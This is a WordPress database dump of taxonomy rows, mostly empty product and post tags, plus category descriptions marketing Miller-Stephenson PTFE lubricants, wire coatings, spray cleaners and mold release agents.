INSERT INTO `wp_term_taxonomy` VALUES (274, 274, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (275, 275, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (276, 276, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (277, 277, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (278, 278, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (279, 279, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (280, 280, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (281, 281, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (282, 282, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (283, 283, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (284, 284, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (285, 285, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (286, 286, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (287, 287, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (288, 288, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (289, 289, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (290, 290, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (291, 291, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (292, 292, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (293, 293, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (294, 294, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (295, 295, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (296, 296, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (297, 297, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (298, 298, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (299, 299, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (300, 300, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (301, 301, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (302, 302, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (303, 303, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (304, 304, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (305, 305, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (306, 306, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (307, 307, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (308, 308, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (309, 309, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (310, 310, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (311, 311, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (312, 312, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (313, 313, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (314, 314, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (315, 315, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (316, 316, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (317, 317, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (318, 318, 'product_tag', '', 0, 7); 
INSERT INTO `wp_term_taxonomy` VALUES (319, 319, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (320, 320, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (321, 321, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (322, 322, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (323, 323, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (324, 324, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (325, 325, 'product_cat', 'Miller-Stephenson <strong>PTFE Dry Film Lubricants</strong> utilize low molecular PTFE (TEFLON)  which enhances surface adhesion, dramatically reduces coefficient of friction and minimizes "slip stick" problems. Our PTFE Dry film lubricants are extremely stable, appropriate for anti-stick, dry film lubrication. Their superior effectiveness provides lubrication over a range of applications for which smooth, repeated movement is essential. Dry Film lubrication products offer great alternatives to greases and oils where long-term friction reduction, clean adherence to components, or cosmetic appearance is top priority. Unlike most oils and greases, PTFE Dry Film lubricants are non-migrating, staying where they are applied rather than spreading into surrounding areas. Dry Films are extremely stable and nonflammable, while offering enough durability to lubricate components for the life of the part. Dry Film lubrication products accommodate almost as many methods of application as the end-use industries they serve. Our <strong>Dry Film dispersions</strong> solve friction problems in diverse industrial processes from the personal care industry to appliance and automotive manufacturing.', 149, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (326, 326, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (327, 327, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (328, 328, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (329, 329, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (330, 330, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (331, 331, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (332, 332, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (333, 333, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (334, 334, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (335, 335, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (336, 336, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (337, 337, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (338, 338, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (339, 339, 'product_cat', 'For years we’ve recognized high purity industrial cleaning as a vital link in maintaining component and system reliability. Here’s what we’ve done to make sure Miller-Stephenson spray cleaners can help achieve the system integrity you need.\r\n\r\n', 10, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (340, 340, 'product_cat', '', 339, 5); 
INSERT INTO `wp_term_taxonomy` VALUES (341, 341, 'product_cat', '', 339, 5); 
INSERT INTO `wp_term_taxonomy` VALUES (343, 343, 'product_cat', '', 339, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (344, 344, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (345, 345, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (346, 346, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (347, 347, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (348, 348, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (349, 349, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (350, 350, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (351, 351, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (352, 352, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (353, 353, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (354, 354, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (355, 355, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (356, 356, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (357, 357, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (358, 358, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (359, 359, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (360, 360, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (361, 361, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (362, 362, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (363, 363, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (364, 364, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (365, 365, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (366, 366, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (367, 367, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (368, 368, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (369, 369, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (370, 370, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (371, 371, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (372, 372, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (373, 373, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (374, 374, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (375, 375, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (376, 376, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (377, 377, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (378, 378, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (379, 379, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (380, 380, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (381, 381, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (382, 382, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (383, 383, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (384, 384, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (385, 385, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (386, 386, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (387, 387, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (388, 388, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (389, 389, 'product_tag', '', 0, 8); 
INSERT INTO `wp_term_taxonomy` VALUES (390, 390, 'product_tag', '', 0, 5); 
INSERT INTO `wp_term_taxonomy` VALUES (391, 391, 'product_tag', '', 0, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (392, 392, 'product_tag', '', 0, 9); 
INSERT INTO `wp_term_taxonomy` VALUES (393, 393, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (394, 394, 'product_tag', '', 0, 6); 
INSERT INTO `wp_term_taxonomy` VALUES (395, 395, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (396, 396, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (397, 397, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (398, 398, 'product_tag', '', 0, 12); 
INSERT INTO `wp_term_taxonomy` VALUES (399, 399, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (400, 400, 'product_tag', '', 0, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (401, 401, 'product_tag', '', 0, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (402, 402, 'product_tag', '', 0, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (403, 403, 'product_tag', '', 0, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (404, 404, 'product_tag', '', 0, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (405, 405, 'product_tag', '', 0, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (406, 406, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (407, 407, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (408, 408, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (409, 409, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (410, 410, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (411, 411, 'product_tag', '', 0, 9); 
INSERT INTO `wp_term_taxonomy` VALUES (412, 412, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (413, 413, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (414, 414, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (415, 415, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (416, 416, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (417, 417, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (418, 418, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (419, 419, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (420, 420, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (421, 421, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (422, 422, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (423, 423, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (424, 424, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (425, 425, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (426, 426, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (427, 427, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (428, 428, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (429, 429, 'product_tag', '', 0, 20); 
INSERT INTO `wp_term_taxonomy` VALUES (430, 430, 'product_tag', '', 0, 20); 
INSERT INTO `wp_term_taxonomy` VALUES (431, 431, 'product_tag', '', 0, 5); 
INSERT INTO `wp_term_taxonomy` VALUES (432, 432, 'product_tag', '', 0, 20); 
INSERT INTO `wp_term_taxonomy` VALUES (433, 433, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (434, 434, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (435, 435, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (436, 436, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (437, 437, 'product_tag', '', 0, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (438, 438, 'product_tag', '', 0, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (439, 439, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (440, 440, 'product_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (441, 441, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (442, 442, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (443, 443, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (444, 444, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (445, 445, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (446, 446, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (447, 447, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (448, 448, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (449, 449, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (450, 450, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (451, 451, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (452, 452, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (453, 453, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (454, 454, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (455, 455, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (456, 456, 'post_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (457, 457, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (458, 458, 'post_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (459, 459, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (460, 460, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (461, 461, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (462, 462, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (463, 463, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (464, 464, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (465, 465, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (466, 466, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (467, 467, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (468, 468, 'post_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (469, 469, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (470, 470, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (471, 471, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (472, 472, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (473, 473, 'post_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (474, 474, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (475, 475, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (476, 476, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (477, 477, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (478, 478, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (479, 479, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (480, 480, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (481, 481, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (482, 482, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (483, 483, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (484, 484, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (485, 485, 'post_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (486, 486, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (487, 487, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (488, 488, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (489, 489, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (490, 490, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (491, 491, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (492, 492, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (493, 493, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (494, 494, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (495, 495, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (496, 496, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (497, 497, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (498, 498, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (499, 499, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (500, 500, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (501, 501, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (502, 502, 'product_tag', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (503, 503, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (504, 504, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (505, 505, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (506, 506, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (507, 507, 'post_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (508, 508, 'post_tag', '', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (509, 509, 'category', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (510, 510, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (511, 511, 'product_cat', '', 11, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (512, 512, 'category', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (514, 514, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (515, 515, 'product_cat', '', 9, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (516, 516, 'product_cat', '', 9, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (517, 517, 'product_cat', '', 9, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (518, 518, 'product_cat', '', 9, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (519, 519, 'product_cat', '', 9, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (520, 520, 'product_cat', '', 9, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (521, 521, 'product_cat', 'Miller-Stephenson offers the most robust and efficient solutions for medical and industrial coatings. With a world-class research and development team behind it, customizations can be made to the coatings to better suit the needs of our customers. On numerous occasions, we have made modifications to the coatings to better suit our customers. These coatings are designed to optimize coating adhesion, durability, and corrosion resistance while minimizing the coefficient of friction.\r\n\r\nThe medical coatings pass all ISO and ASTM guidelines.\r\n\r\nApplications include industrial and medical wires and medical devices. Medical devices include disposable and non-disposable cautery tips among many others.\r\n\r\nCall our technical support at 800-442-3424 or E-mail support@mschem.com.', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (522, 522, 'product_cat', '', 521, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (523, 523, 'product_cat', 'Miller-Stephenson’s specialty medical wire coatings offer world-class quality, value, and reliability to the medical industry. Today’s constantly evolving medical industry continues to raise the performance requirements of friction-reducing coatings and Miller-Stephenson has responded delivering novel,<span style="text-decoration: underline;"> Next-Generation Fluoropolymer Coatings</span> to its customers. With over 40 years of innovation and development in medical coatings, Miller-Stephenson have the technical prowess and operational capacity to deliver the highest of quality products and customer service to its medical customers.\r\n\r\nMiller-Stephenson offers the most advanced, forward-looking fluoropolymer medical wire coatings to meet your needs. Our coatings come available in water-based, one coat systems which contain no dangerous acid primers, yet delivery the same exception surface adhesion and durability. Our Medical division continues to provide our customers with the highest quality products and service they have come to expect.  <a href="https://www.miller-stephenson.com/medical-guidewire-coatings/">To read more about our medical coatings please look at the article section of our website.</a>', 521, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (524, 524, 'product_cat', '<em><span style="text-decoration: underline;"><strong>Industrial Wire Coatings</strong></span> </em>- Miller-Stephenson provides ultra high-performance coatings and DryFilm lubrication products  which offer great alternatives to greases and oils where long-term friction reduction, clean adherence to components, or cosmetic appearance is top priority. Our coatings provide long-lasting, durable films on the surface of all metallic and non-metallic surfaces. Our Industrial wire coatings are chemical resistant, fast curing, and have variable hardness levels to meet your specific performance requirements. The Industrial Wire Coatings are extremely stable and robust, while offering enough durability to lubricate components for the life of the part. These coating / lubrication coatings accommodate almost as many methods of application as the end-use industries they serve. The unique properties of our coatings makes them ideal in coatings that enhance lubricity and antistick properties on conductor or insulated wire and cable. Our fully synthetic and highly crosslinked coatings, enhance surface adhesion and durability. These DryFilm dispersions are used to impart a thin, nonstick film on metal wires or on insulated wire for cable products and twisted wire in jackets. DryFilm lubrication products reduce insulation stripping force and provide nonstick abrasion resistance to twisted wire and lubricity for welding wire, wire forming, and knitting.', 521, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (525, 525, 'product_cat', 'Miller-Stephenson offers the most technologically advanced mold release agents solutions available, backed by over 40 years of research, development and technical expertise. Our mold release agents are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson’s specialized mold release agents offer customers numerous benefits and the benefits of our products will become evident immediately after their first application!', 21, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (526, 526, 'product_cat', 'ReleaSys<em>™ </em>Liquid release agents are the ideal product for companies looking to maximize their efficiency, cost-effectiveness, and through-put.  Miller-Stephenson\'s ReleaSys Semi-permanent mold release agents  are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield unmatched utility and efficient for the robust and constantly evolving composite industry. These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistance, and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> Miller-Stephenson’s ReleaSys semi-permanent line. </strong>We have solutions which are ideally suited or injection molding, compression and transfer molding.\r\n\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their molding operations. Whether it be for urethanes, elastomers, rotational molding, thermoset composites, etc Miller-Stephenson\'s ReleaSys product line has the most efficient portofolio of products to meet your specifications. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys semi-permanents mold release agents, along with our industry leading support network, brings significant operational benefits.', 21, 7); 
INSERT INTO `wp_term_taxonomy` VALUES (527, 527, 'product_cat', '<span style="text-decoration: underline;"><strong>Miller-Stephenson\'s MS-122 PTFE aerosol spray </strong></span>systems have been providing customers with the most efficient and robust release agent solutions for more than 50 years. Our MS-122 product line has proven itself in the most difficult and technically challenging molding operations around the globe. Our mold release agents are optimized to maximize the throughput and efficiency of the critical parts you mold; from thermoplastics to O-rings, electric motor potting to FRP-composites, Miller-Stephenson has a solution for your molding operation. No other aerosolized PTFE provides more utility, cost-effectiveness, and efficiency as the proven-technology with Miller-Stephenson\'s MS-122 PTFE aerosol spray systems.', 16, 6); 
INSERT INTO `wp_term_taxonomy` VALUES (528, 528, 'product_cat', '<span style="text-decoration: underline;"><strong>Miller-Stephenson\'s MS-143 PTFE mold release</strong></span> agents are known industry-wide as a series of products which delivery unmatched utility, productivity and increases to throughput. MS-143 can be called upon for routine molding operations but, due to its unique chemistry, will also excel in the most challenging and complex molding operations. Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives. This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE’s chemical inertness and low-transfer will not interfere with the sensitive electronics.', 16, 4); 
